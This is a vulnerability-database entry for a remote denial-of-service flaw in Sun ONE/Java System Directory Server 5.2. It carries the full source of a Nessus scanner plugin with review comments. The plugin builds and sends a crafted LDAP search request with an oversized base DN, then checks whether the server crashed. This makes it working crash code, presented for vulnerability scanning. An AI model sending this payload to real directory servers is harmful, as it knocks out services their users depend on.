Vulnerabilities > CVE-2006-0647 - Remote Denial Of Service vulnerability in SUN Java System Directory Server 5.2

CVSS 5.0 - MEDIUM
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: NONE
Integrity impact: NONE
Availability impact: PARTIAL
network
low complexity
sun
nessus
exploit available

Summary

LDAP service in Sun Java System Directory Server 5.2, running on Linux and possibly other platforms, allows remote attackers to cause a denial of service (memory allocation error) via an LDAP packet with a crafted subtree search request, as demonstrated using the ProtoVer LDAP test suite.

Vulnerable Configurations

Part Description Count
Application
Sun
1

Exploit-Db

description: Sun ONE Directory Server 5.2 Remote Denial Of Service Vulnerability. CVE-2006-0647. DoS exploits for multiple platforms
id: EDB-ID:27171
last seen: 2016-02-03
modified: 2006-02-08
published: 2006-02-08
reporter: Evgeny Legerov
source: https://www.exploit-db.com/download/27171/
title: Sun ONE Directory Server 5.2 - Remote Denial of Service Vulnerability

Nessus

NASL family: Denial of Service
NASL id: SUNONE_LDAP_DOS.NASL
description: The remote host appears to be running Sun ONE Directory Server, an LDAP directory from Sun. The version of Sun ONE Directory Server fails to handle certain malformed search requests. A user can leverage this issue to crash not just the LDAP server but also the entire application on the remote host.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 20888
published: 2006-02-13
reporter: This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/20888
title: Sun ONE Directory Server LDAP Malformed Packet DoS
code
#
# (C) Tenable Network Security
#

include("compat.inc");

# Registration pass: when the scanner loads the plugin with `description`
# set, only the metadata below is recorded and the script exits before any
# network traffic is generated.
if (description)
{
  # Plugin identity and revision.
  script_id(20888);
  script_version("1.17");

  # Cross-references to the advisory databases.
  script_cve_id("CVE-2006-0647");
  script_bugtraq_id(16550);

  script_name(english:"Sun ONE Directory Server LDAP Malformed Packet DoS");
  script_summary(english:"Checks for denial of service vulnerability in Sun ONE Directory Server");

  # Report text shown to the operator.
  script_set_attribute(
    attribute:"synopsis",
    value:"The remote LDAP server is prone to denial of service attacks."
  );
  script_set_attribute(
    attribute:"description",
    value:"The remote host appears to be running Sun ONE Directory Server, an
LDAP directory from Sun. 

The version of Sun ONE Directory Server fails to handle certain
malformed search requests.  A user can leverage this issue to crash
not just the LDAP server but also the entire application on the remote
host."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://seclists.org/dailydave/2006/q1/128"
  );
  script_set_attribute(
    attribute:"solution",
    value:"Upgrade to Sun ONE Directory Server 5.2patch5."
  );

  # Base vector: network-reachable, low complexity, no authentication,
  # availability impact only (partial).
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  # Temporal vector: proof-of-concept exploit, official fix, confirmed report.
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  # Timeline: disclosure, plugin release, vendor patch.
  script_set_attribute(attribute:"plugin_publication_date", value: "2006/02/13");
  script_set_attribute(attribute:"vuln_publication_date", value: "2006/02/08");
  script_set_attribute(attribute:"patch_publication_date", value: "2006/05/19");
  script_cvs_date("Date: 2018/11/15 20:50:21");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  # ACT_DENIAL marks this as an intrusive check: the test below tries to
  # crash the service rather than fingerprint its version. Scan policies
  # with safe checks enabled normally exclude this category -- confirm the
  # policy before running it against production directories.
  script_category(ACT_DENIAL);
  script_family(english:"Denial of Service");

  script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");

  # Run after LDAP service detection, and only when an LDAP service or
  # port 2571 is listed for the target.
  script_dependencies("ldap_detect.nasl");
  script_require_ports("Services/ldap", 2571);

  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");

# Pick the port to test: the one recorded for the "ldap" service, with 2571
# as the fallback. exit_on_fail is set, so the plugin presumably stops here
# when no usable port is available.
# NOTE(review): 2571 is not the standard LDAP port (389) -- confirm the
# fallback is intentional.
port = get_service(svc: "ldap", default: 2571, exit_on_fail: 1);


# Build the LDAP search request used as the probe.
#
# The BER framing itself is consistent: every length field below is
# hard-coded to match a 40000-byte filler in the base DN. The only unusual
# element visible here is the size of that base DN (about 40 KB).
#
# Defensive note: a search request carrying a base DN of this size is not
# something normal directory clients send, so capping request / DN size at
# an LDAP proxy or flagging it in network monitoring is a reasonable
# compensating control where the fixed release named in the plugin's
# "solution" attribute cannot be deployed.
req = 
  raw_string(
    0x30,                              # SEQUENCE: LDAP message envelope
    0x82, 0x9c, 0x78,                  # envelope length, 2-byte long form (0x9c78 = 40056)
    0x02, 0x01, 0x01,                  # message id (1)
    0x63,                              # search request
    0x82, 0x9c, 0x71,                  #   request length (0x9c71 = 40049)
    0x04, 0x82, 0x9c, 0x55             #   base DN: OCTET STRING header (0x9c55 = 40021)
  ) +
  "dc=" + crap(data:"+", length:40000) + ",dc=example,dc=com" +
  raw_string(
    0x0a, 0x01, 0x02,                  #   scope (subtree)
    0x0a, 0x01, 0x00,                  #   dereference (never)
    0x02, 0x01, 0x00,                  #   size limit (0)
    0x02, 0x01, 0x00,                  #   time limit (0)
    0x01, 0x01, 0x00,                  #   attributes only (false)
    0xa2, 0x05, 0x87, 0x03,            #   filter (!(foo=*))
      "foo", 0x30, 0x00                #   filter attribute name, then an empty attribute list
  );


# Deliver the probe over a fresh TCP connection and read up to 1 KB of reply.
# If the connection cannot be opened the plugin exits with status 1 and
# reports nothing.
sock = open_sock_tcp(port);
if (!sock) exit(1);

send(socket:sock, data:req);
reply = recv(socket:sock, length:1024);
close(sock);

# Verdict logic: only a missing reply followed by a dead port is reported.
# A server that answers, or that stays reachable after staying silent, is
# not flagged -- so a clean result means "did not crash during this probe",
# not "patched". Cross-check against the installed version where possible.
if (reply == NULL) {
  # nb: at least under Windows, the server doesn't crash immediately,
  #     so give it a few seconds before re-testing the port.
  sleep(5);

  # Report only when the service can no longer be reached.
  # NOTE(review): anything else that makes the port unreachable in this
  # window (filtering, an unrelated restart) would also be reported.
  if (service_is_dead(port:port) > 0) {
    security_warning(port);
    exit(0);
  }
}